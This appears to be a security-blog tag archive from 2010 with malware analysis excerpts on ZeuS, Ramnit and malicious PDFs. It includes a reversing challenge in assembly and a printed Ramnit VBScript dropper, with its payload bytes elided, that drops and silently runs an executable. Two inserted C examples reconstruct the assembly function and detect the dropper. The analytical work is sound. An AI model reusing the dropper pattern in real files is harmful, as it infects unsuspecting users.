Tag Archive | "Analysis"

Analysis: Monthly Malware Statistics, November 2010

By far the biggest threat to users this month was drive-by downloads. This type of attack can result in users’ computers being infected even when visiting legitimate sites. – on Securelist / All Updates


Analysis: Internet fraud for dummies: practical advice for protecting yourself against online scams

Internet fraud has been around for just about as long as the Internet itself. Each year, cybercriminals come up with new techniques and tactics designed to fool their potential victims. – on Securelist / All Updates


Analysis: Spam report: October 2010

As we wrote in last month’s report, at the end of September law enforcement agencies arrested a number of members of the criminal group behind ZeuS. – on Securelist / All Updates


Analysis: Spam in the Third Quarter of 2010

The third quarter of 2010 started off with several favorable events for the anti-spam industry. In August, the security intelligence firm Lastline worked with a task force to shut down over 20 control centers used by the Pushdo / Cutwail botnet…

View full post on Securelist / All Updates


Analysis: Monthly Malware Statistics, October 2010

Overall, October was relatively quiet, although there were a few incidents worthy of note. Virus.Win32.Murofet, which infected a large number of PE files, was detected at the beginning of the month.

View full post on Securelist / All Updates


Boonana Threat Analysis

Our interim analysis of a version of the malware we detect as Java/Boonana.A or Win32/Boonana.A (depending on the particular component of this multi-binary attack) differs in some characteristics from other reports we've seen.
The most dramatic difference is in the social engineering hook used in messages sent to an infected user's friends list. Other reports (including …

View full post on ESET ThreatBlog


Analysis: Spam report: September 2010

The most significant event of the month was the announcement in mid-September that the SpamIt partner program would be closed down on 1 October.

View full post on Securelist / All Updates


Full Analysis of the ZeuS-LICAT Trojan

Following last September’s turn of events, where several individuals were arrested for using information stealing Trojans known as the ZeuS toolkit, a much anticipated “upgrade” was inevitable so that it could continue its money-making ploy. Soon enough, we received cases about a ZeuS Trojan (TSPY_ZBOT.BYZ) with the following new features:

  1. Trojanizing executable files to keep the malware updated (turning them into PE_LICAT.A) and more difficult to remove.
  2. Contacting pseudorandomly generated domains à la DOWNAD/Conficker to avoid easy takedowns.

Over the past few weeks we have been working on completing a comprehensive report on this new ZeuS upgrade. This includes analysis of its runtime decompression/de-obfuscation stub, configuration file decryption used in its information-stealing payload, the command and control servers used, and the above-mentioned file infection and domain generation algorithm.

Earlier this week, reports about the supposed SpyEye and ZeuS toolkit merger came out. The result of this merger may be a hybrid toolkit that uses the best features of both SpyEye and ZeuS.

The full analysis in the report, File-Patching ZBOT Variants: ZeuS 2.0 Levels Up, is the result of the collaborative effort of TrendLabs engineers/researchers Alvin Bacani, Mark Anthony Balanza, Feike Hacquebord, Marco Dela Vega, Julius Dizon, Patrick Estavillo, Jasper Manuel, Loucif Kharouni, David Sancho, Ben April and Robert McArdle.

We have been chronicling our findings about TSPY_ZBOT.BYZ, the ZeuS Trojan with LICAT features, in the following entries:

View full post on TrendLabs | Malware Blog – by Trend Micro


Analysis: Cyber Expert. Artificial Intelligence in the realms of IT security

Is it possible to define human intelligence so precisely as to be able to then simulate it with the aid of machines? That is still very much a bone of contention among the scientific community.

View full post on Securelist / All Updates


Entertaining risk analysis

Risk management is, in a word, complicated. Hmmm… not strong enough – make that two words, it’s extremely complicated.

View full post on Network World on Security


Several Malware Analysis Reports to Learn From

Analyzing malware helps you understand the overall threat landscape. The next best thing to reverse-engineering malicious programs yourself is learning from other analysts’ reports.

Here are several excellent write-ups, authored by different researchers, which describe several types of malicious software:

  • Murofet exhibits file infection and password stealing abilities. Marco Giuliani at Prevx provided insightful analysis of this specimen.
  • Avzhan is a growing family of DDoS bots. Jeff Edwards at Arbor Networks offered a comprehensive overview of this family of malware.
  • Visal is an email worm that spreads links to malicious Windows executable files. It was thoroughly examined by SecureWorks.
  • The “Hottest girls on Facebook” worm uses clickjacking and social engineering to propagate. It was researched by Krzysztof Kotowicz. George Deglin examined another example of a Facebook worm.
  • A malicious PDF file can split JavaScript across several objects. An example of this technique was documented by Tamas Rudnai at Websense.
  • Attacks often combine a malicious PDF file with a Windows executable. One such incident was analyzed by CW.

I periodically post interesting malware analysis reports from across the web on the Reverse-Engineering Malware Course page on Facebook.

If you’d like to improve your own malware report-writing skills, take a look at my earlier note What to Include in a Malware Analysis Report, which includes a mind-map template.

Lenny Zeltser

View full post on Lenny Zeltser on Information Security


Analysis: Parental Control and The Internet

The World Wide Web: educational or detrimental?

View full post on Securelist / All Updates



ZeuS’ Response to Automated Analysis

We’ve been spending some time looking into TSPY_ZBOT.BYZ—the ZeuS variant that was used in the recent LICAT file infector attack.

Aside from the behaviors noted in previous blog posts (File Infector Uses Domain Generation Technique Like DOWNAD/Conficker and ZeuS Ups the Ante with LICAT), TSPY_ZBOT.BYZ also uses techniques designed to avoid automatic heuristics-based detection. For example, common ZeuS 2.0 variants contain relatively few imported external APIs. (ZeuS 2.0 refers to variants of the ZeuS banking malware that have been spotted since the start of the year with improved information theft routines. They have been discussed in the previous blog posts At A Glance: New ZeuS Variants and A Look at ZBOT 2.0 Information Theft.)

By contrast, TSPY_ZBOT.BYZ imports many external APIs. To a heuristic scanner, this changes the appearance of the file and lowers the possibility of detection.


In addition, TSPY_ZBOT.BYZ is compressed somewhat differently from other ZeuS 2.0 variants. While no differences are easily visible to the human eye, the calculated entropy of these samples is quite different. Related encrypted and packed malware samples will have similar entropy values, something that can be used in analysis and heuristic detections.

TSPY_ZBOT.BYZ is also designed to make analysis in sandboxed environments more difficult. Its dropped copy in the %Application Data% folder will have updated information about its “correct” location. If this particular copy is executed in a different folder, it will simply terminate.

Another routine especially worth noting is that TSPY_ZBOT.BYZ conducts an integrity check by searching for the string “DAVE” in its configuration file before performing its malicious routines. We are currently conducting further investigation on this routine and we will release an update as soon as information becomes available.

Update as of October 13, 2010, 6:00 PM (UTC – 7)

Clarification has been made with regard to the malware’s behavior in sandboxed systems.

Update as of October 14, 2010, 2:00 AM (UTC – 7)

Some of the domains used in these ZeuS attacks are now live and spreading new ZeuS variants. These variants show behavior similar to the original TSPY_ZBOT.BYZ sample and are being proactively detected as TSPY_ZBOT.SMEQ. The active domains are being blocked as well.

These new variants show the impact of TSPY_ZBOT.BYZ being able to avoid heuristic detection. Determining the relationship between TSPY_ZBOT.BYZ and the new variants would become harder; correspondingly the new variants would be more difficult to detect. However, our smart patterns are able to deal with this and detect these new variants accordingly.

To properly guard against this threat, conventional antivirus is not sufficient. Both improved detection techniques and proactive blocking of the websites, working together, can protect users.

View full post on TrendLabs | Malware Blog – by Trend Micro


Analysis: Cybercrime Raiders

The security was tight enough, but the raider knew exactly where the weak point in the system was. He had undergone special training to help him slip unnoticed through loopholes like these and infiltrate the network. The raider creates the loophole that lets others in — spies, thieves or…

View full post on Securelist / All Updates


Function Analysis

While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it’s still unclear what the function does.

Since you don’t have access to the callers of this function, I’ll tell you this:

  • The first argument is a null-terminated ASCII string.
  • The second argument is a null-terminated ASCII string.
  • The third argument is an integer.

Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations:

  • Cannot refer to the name of a person, place, or time.
  • Cannot refer to anything obscene or offensive.
  • Cannot be found in a dictionary or web search.
  • Cannot use camel-casing for compound words — must begin with one uppercase letter and end with all lowercase letters.
  • Must be a “generic” name (for example, shouldn’t contain the word “bot” or “worm”, since I have no idea what class of malware I’ll end up naming next).
  • Must be humanly pronounceable.
  • Must be between four and eight letters in length.
  • I have final discretion over the name in case you think of something “bad” that isn’t covered by one of the rules above.

The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does.

And in case you think I’m “hiring cheap labor” to analyze this for me, I’ll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I’ll post my analysis which hashes to that MD5.

Here’s the function:

sub_0           proc near

var_10 = dword ptr -10h
var_C  = dword ptr -0Ch
var_8  = dword ptr -8
var_4  = dword ptr -4
arg_0  = dword ptr 8
arg_4  = dword ptr 0Ch
arg_8  = dword ptr 10h

push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_8], 697A259Dh
xor [ebp+var_8], 182Ch
inc dword ptr ds:42C094h
and [ebp+var_C], 0
and [ebp+var_4], 0
jmp short loc_94
; —————————————————————————

loc_2A: ; CODE XREF: sub_0+A6j
xor ebx, ebx
add [ebp+var_8], 3AA5h
inc dword ptr ds:42C094h
xor edi, edi
jmp short loc_81
; —————————————————————————

loc_3D: ; CODE XREF: sub_0+8Fj
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
movsx edx, byte ptr [esi+edi]
cmp eax, edx
jnz short loc_52
inc ebx

loc_52: ; CODE XREF: sub_0+4Fj
mov ecx, esi
or eax, 0FFFFFFFFh

loc_57: ; CODE XREF: sub_0+5Cj
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_57
cmp ebx, eax
jnz short loc_72
inc [ebp+var_C]
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_72
mov eax, [ebp+var_4]
jmp short loc_C0
; —————————————————————————

loc_72: ; CODE XREF: sub_0+60j ; sub_0+6Bj
mov eax, 43C9h
mul [ebp+var_8]
mov [ebp+var_10], eax
mov [ebp+var_8], eax
inc edi

loc_81: ; CODE XREF: sub_0+3Bj
mov ecx, esi
or eax, 0FFFFFFFFh

loc_86: ; CODE XREF: sub_0+8Bj
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_86
cmp edi, eax
jb short loc_3D
inc [ebp+var_4]

loc_94: ; CODE XREF: sub_0+28j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh

loc_9C: ; CODE XREF: sub_0+A1j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_9C
cmp [ebp+var_4], eax
jb short loc_2A
mov eax, 0FFFFh
jmp short loc_C0
; —————————————————————————
mov eax, 514Ah
mul dword ptr [ebp-8]
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov [ebp-8], eax

loc_C0: ; CODE XREF: sub_0+70j ; sub_0+ADj
pop edi
pop esi
pop ebx
leave
retn
sub_0 endp

And here’s the raw byte-code for the function above:

5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200
8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC
01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3
7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8
4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01
0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8
5F5E5BC9C3
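As an added example (my own reading of the listing above, not the post’s answer or its MD5-hashed analysis), here is sub_0 carried back into C. The parameter names haystack, needle and wanted are mine; the red-herring arithmetic on var_8/var_10, the counter at ds:42C094h and the unreachable block after the second jmp short loc_C0 are left out because nothing the function returns depends on them.

```c
#include <stdio.h>
#include <string.h>

/* 0FFFFh, the value loc_94 loads into eax once var_4 has run past
 * strlen(arg_0).  It is also a valid index in a string longer than
 * 65535 bytes, so a caller cannot tell the two cases apart. */
#define SUB0_NOT_FOUND 0xFFFFu

/* Mapping used below: arg_0 -> haystack, arg_4 -> needle, arg_8 -> wanted,
 * var_4 -> i, edi -> j, ebx -> matched, var_C -> found. */
unsigned int sub_0(const char *haystack, const char *needle, unsigned int wanted)
{
    size_t hlen = strlen(haystack);       /* strlen loop at loc_9C */
    size_t nlen = strlen(needle);         /* strlen loops at loc_86 / loc_57 */
    unsigned int found = 0;               /* and [ebp+var_C], 0 */

    for (size_t i = 0; i < hlen; i++) {               /* jb short loc_2A */
        unsigned int matched = 0;                     /* xor ebx, ebx */
        for (size_t j = 0; j < nlen; j++) {           /* jb short loc_3D */
            /* loc_3D reads haystack[i+j] without checking hlen, so it can
             * read past the terminator.  The NUL there never equals a needle
             * byte, and one miss makes matched == nlen impossible, so
             * stopping early here is observably the same and bounds-safe. */
            if (i + j >= hlen)
                break;
            if (haystack[i + j] == needle[j])         /* cmp eax, edx */
                matched++;                            /* inc ebx */
            /* cmp ebx, strlen(needle): true only when every byte matched */
            if (matched == nlen) {
                found++;                              /* inc [ebp+var_C] */
                if (found == wanted)                  /* cmp [ebp+var_C], arg_8 */
                    return (unsigned int)i;           /* mov eax, [ebp+var_4] */
            }
        }
    }
    return SUB0_NOT_FOUND;                            /* mov eax, 0FFFFh */
}

int main(void)
{
    /* Second occurrence of "bc" in "abcbc" starts at index 3. */
    printf("%u\n", sub_0("abcbc", "bc", 2));
    /* var_C is incremented before it is compared with arg_8, so
     * wanted == 0 can never match and the result is 0xFFFF. */
    printf("%#x\n", sub_0("abcbc", "bc", 0));
    return 0;
}
```

Overlapping occurrences are counted separately, because the outer index advances by one byte regardless of whether a match was just found.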

View full post on REblog


Free Toolkits for Automating Malware Analysis

Automating some aspects of malware analysis is critical for organizations that process large numbers of malicious programs. Such automation allows analysts to focus on the tasks that require human insights. There are several free toolkits you can use as the starting point for building your own automated malware analysis lab. The focus of this post is on the tools you can install locally; I wrote about free web-based behavioral analysis services earlier.

Two feature-rich and highly customizable options are outlined below:

There are several other toolkits you may find useful for automating aspects of behavioral malware analysis:

  • Zero Wine by Joxean Koret is a full-featured tool for dynamically analyzing the behavior of Windows malware by running it within the WINE emulator on Linux.
  • Buster Sandbox Analyzer by Buster is a wrapper around the Sandboxie tool for Windows, which helps you examine the key actions of applications executed by Sandboxie in your lab.
  • Malheur by Konrad Rieck is a very promising tool for analyzing the volumes of data collected by behavioral sandboxes.
  • REMnux by yours truly is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software.

If you’re interested in building your own malware analysis toolkit for manual behavioral review, take a look at the article I wrote earlier. You may also be interested in reading about the limitations of automated malware analysis.

Lenny Zeltser

View full post on Lenny Zeltser on Information Security


Analysis: Monthly Malware Statistics, September 2010

There are relatively few new malicious programs in either ranking. It is, however, worth highlighting a new ‘bundle’: Trojan-Dropper.Win32.Sality.cx which installs Virus.Win32.Sality.bh to an infected computer.

View full post on Securelist / All Updates


6 Hex Editors for Malware Analysis

My article on the SANS Forensics Blog describes 6 hex editors for analyzing malware and malicious documents. I outlined and compared key features for:

  • FileInsight
  • Hex Editor Neo
  • FlexHex
  • 010 Editor
  • Hiew
  • Radare

The tools differ in their ease-of-use and features. Of these, FileInsight and 010 Editor are my picks for Windows, and Radare is my favorite for Unix.

Lenny Zeltser

View full post on Lenny Zeltser on Information Security



Quick Analysis Of W32.Ramnit (aka DesktopLayer.exe)

Recently I came across a malware sample which showed some suspicious network activity towards a domain called zahlung.name. The domain name looks very suspicious (“Zahlung” is the German word for “payment”), so I decided to take a closer look at the sample.

The malware which I will be talking about in this post is a worm called W32.Ramnit. The worm was first discovered in 2010 (in January by Symantec and in August by McAfee).

*** Worm W32.Ramnit ***
Let’s take a quick look at the behavior of Ramnit. The worm always installs itself into the same directory using the same filename:

C:\Program Files\Microsoft\DesktopLayer.exe

In this case the file has a very bad AV detection rate:

Filename: DesktopLayer.exe
MD5: 8746774d1033048dcdc6f82ffaffd80d
SHA1: 142fca53e1ffd6b40803d7989417fd6e4fbab1b4
File size: 51’200 bytes
VT Result: 3 /43 (7.0%)

After the worm has infected the computer, it starts iexplore.exe in invisible mode and injects itself into the process. In this way the worm is able to bypass the local firewall and communicate with its Command & Control (C&C) server.

As soon as the computer is infected, the worm starts to spread itself by infecting all files on the victim’s computer which have the file extension EXE, DLL or HTML. For example, if QuickTime Player is installed on the victim’s computer, the worm will automatically search through the directory and infect the EXE, DLL and HTML files. Below is a screenshot of a clean system (before the infection):

Followed by a screenshot of an infected system (same directory):

Note that the file size and the modified date of the infected files have changed. The same goes for other directories with EXE, DLL or HTML files, for example the Adobe Reader directory (before the infection):

And after infection:

Let’s compare the original (clean) files with the infected files which have been patched by the Ramnit worm:

*** QTTask.exe (QuickTime) ***
Clean
* MD5: 6df76965a0fb8237e9c3b3cab9815ec2
* File size: 413’696 bytes
* VT result: 0/41 (0.0%)

Infected
* MD5: c32b6f477c5454d4e2cded81e686036d
* File size: 466’944 bytes
* VT result: 38/42 (90.5%)

*** AGM.dll (Adobe Reader) ***
Clean
* MD5: 8f0b2030b5e42235c855a94a17f57118
* File size: 4’883’456 bytes
* VT result: 0/41 (0.0%)

Infected
* MD5: 833c79d662f8cc47579540dc03505419
* File size: 4’936’192 bytes
* VT result: 39/43 (90.7%)

As shown on VirusTotal, the files which have been infected by the worm are detected quite well by most of the AV engines.

If we take a closer look into an infected HTML file, we will see that the worm has added a VB-Script at the end of the file:

<script type='text/javascript'>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000[...]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

If a user runs the HTML file, the VB-Script will drop a file called “svchost.exe” and infect the computer.
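As an added example (not abuse.ch’s code), a small C check that flags the appended dropper described above: it looks for a VBScript block carrying the markers of that script and, separately, whether the block sits after the page’s closing </html>, which is where the worm appends it. The sample page and the function names are constructed for this example; the dropper text is the post’s, with the executable bytes elided as in the post.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Case-insensitive substring search (strcasestr is not portable C). */
static const char *ci_find(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t k = 0;
        while (k < n && hay[k] &&
               tolower((unsigned char)hay[k]) == tolower((unsigned char)needle[k]))
            k++;
        if (k == n)
            return hay;
    }
    return NULL;
}

/* Markers taken from the dropper the post shows appended to infected HTML. */
static const char *const RAMNIT_MARKERS[] = {
    "DropFileName",
    "WriteData",
    "Scripting.FileSystemObject",
    "GetSpecialFolder(2)",
    "CreateTextFile(DropPath",
    "WScript.Shell",
};
#define N_MARKERS (sizeof RAMNIT_MARKERS / sizeof RAMNIT_MARKERS[0])

/* Number of markers (0..6) present inside a VBScript block; 0 if the file has
 * no VBScript block at all.  A legitimate page has no reason to write a
 * hex-encoded executable into the temp folder and run it, so >= 4 is a hit. */
int ramnit_html_score(const char *html)
{
    const char *vbs = ci_find(html, "<script language=vbscript>");
    int hits = 0;
    if (vbs == NULL)
        return 0;
    for (size_t i = 0; i < N_MARKERS; i++)
        if (ci_find(vbs, RAMNIT_MARKERS[i]) != NULL)
            hits++;
    return hits;
}

int ramnit_html_infected(const char *html)
{
    return ramnit_html_score(html) >= 4;
}

/* The worm appends its block after the page proper, so the VBScript block
 * should sit after the last </html>. */
int ramnit_script_is_appended(const char *html)
{
    const char *vbs = ci_find(html, "<script language=vbscript>");
    const char *last_html = NULL;
    const char *p = html;
    while ((p = ci_find(p, "</html>")) != NULL) {
        last_html = p;
        p++;
    }
    return vbs != NULL && last_html != NULL && vbs > last_html;
}

/* Constructed sample: a harmless page with the post's dropper appended; the
 * hex-encoded executable is elided exactly as in the post. */
const char *const SAMPLE_INFECTED =
    "<html><body><h1>Release notes</h1></body></html>\n"
    "<script type='text/javascript'> <SCRIPT Language=VBScript><!-- "
    "DropFileName = \"svchost.exe\" WriteData = \"4D5A900003000000[...]\" "
    "Set FSO = CreateObject(\"Scripting.FileSystemObject\") "
    "DropPath = FSO.GetSpecialFolder(2) & \"\\\" & DropFileName "
    "If FSO.FileExists(DropPath)=False Then "
    "Set FileObj = FSO.CreateTextFile(DropPath, True) "
    "For i = 1 To Len(WriteData) Step 2 "
    "FileObj.Write Chr(CLng(\"&H\" & Mid(WriteData,i,2))) Next FileObj.Close End If "
    "Set WSHshell = CreateObject(\"WScript.Shell\") WSHshell.Run DropPath, 0 "
    "//--></SCRIPT>";

/* Constructed clean page that happens to reuse one of the identifier names. */
const char *const SAMPLE_CLEAN =
    "<html><body><script type='text/javascript'>var DropFileName = 1;"
    "</script></body></html>";
```

Run over a directory of HTML files, a hit on both checks at once is a strong sign the host has been through the file-infection step and warrants a look for DesktopLayer.exe as well.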

*** C&C Communication ***
The worm uses its own proprietary protocol to communicate with the C&C server on port 443 (which is normally HTTPS). Since August 2010 I’ve seen three different domain names being used by the Ramnit worm:

I Googled all three domain names and found no evidence that they are malicious. But of course they are. Unfortunately, looking up those domain names on URLVoid doesn’t look any better:

It’s a pretty good example of how the AV industry sometimes fails.

*** How the Worm spread itself ***
The Ramnit worm uses several ways to spread itself and infect other computers:

  • Drive-by exploits
  • Infecting EXE, DLL and HTML files on the victim’s computer
  • Infecting removable media, including USB sticks, USB hard drives and CDs

*** Conclusion ***
Because the worm always installs itself as “DesktopLayer.exe”, it shouldn’t be too hard to identify infected systems. If you Google for “DesktopLayer.exe” you will see over 30’000 hits, including users complaining about the file “DesktopLayer.exe” which they just found on their computer. So it looks like the worm is already pretty widespread.

As already mentioned, the worm has various methods by which it can spread itself. Worms are mainly a big problem for large networks (like corporate or governmental networks): if you have one infected computer, the worm will spread quickly within your network by infecting removable drives or files on network shares.

The mentioned C&C domain names which are associated with the Ramnit worm are already listed on AMaDa. Therefore you can use the AMaDa C&C Domain Blocklist to block C&C traffic or identify infected systems in your network.


View full post on abuse.ch


Analysis: The antivirus weather forecast: cloudy

These days, when you scan Internet resources or take part in discussions, you inevitably come across materials and comments related to the use of cloud technology in antivirus protection.

View full post on Securelist / All Updates


Websense Insight: Link Analysis – What links are people sharing on Facebook and Twitter?

With millions of Tweets and Facebook postings flying around daily from personal and business users, have you ever wondered where the links in these postings go?

In this Websense Insight we have analyzed hundreds of thousands of social networking links to determine the ecosphere of links and the potential threat vectors of the social Web.  Some of the findings may truly surprise you.

For example, did you know that 40 percent of Facebook status posts contain a URL, and that 10 percent of those are either spam or malicious?

We also provide some top tips for avoiding the potential dangers of user generated content within an organization and on your own Facebook wall.

To learn more about Websense Threat research in addition to this blog or view additional Websense Insights, please visit the Insights tab on http://community.websense.com/blogs/

To download the free Defensio application for free individual use, please visit defensio.com.

We'll have more analysis of these statistics and other Web Security findings in our upcoming "State of the Internet Report."

View full post on Security Labs


Analysis: Online gaming fraud: the evolution of the underground economy

Whatever type of game you take as an example – a card game, a board game, or a game of cops and robbers – attempts to cheat will be as old as the game itself.

View full post on Securelist / All Updates


PDF analysis paper, (Sun, Sep 26th)

Didier Stevens (of pdf-parser.py fame) has published a 23-page paper on how to analyze nasty PDFs. While the content is a bit dated and the attackers have added more insidious exploit obfuscation to their arsenal since, the document explains all the concepts that are still valid and useful whenever you encounter a suspicious PDF today. If you’re into PDF analysis (and even if you aren’t :) , this is a must-read. http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book/

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

View full post on SANS Internet Storm Center, InfoCON: green



Free Malicious PDF Analysis E-book

The title says it all…

This is a document I shared with my Brucon workshop attendees.

I know, this is a PDF document, you’ve to appreciate the irony ;-)

View full post on Didier Stevens

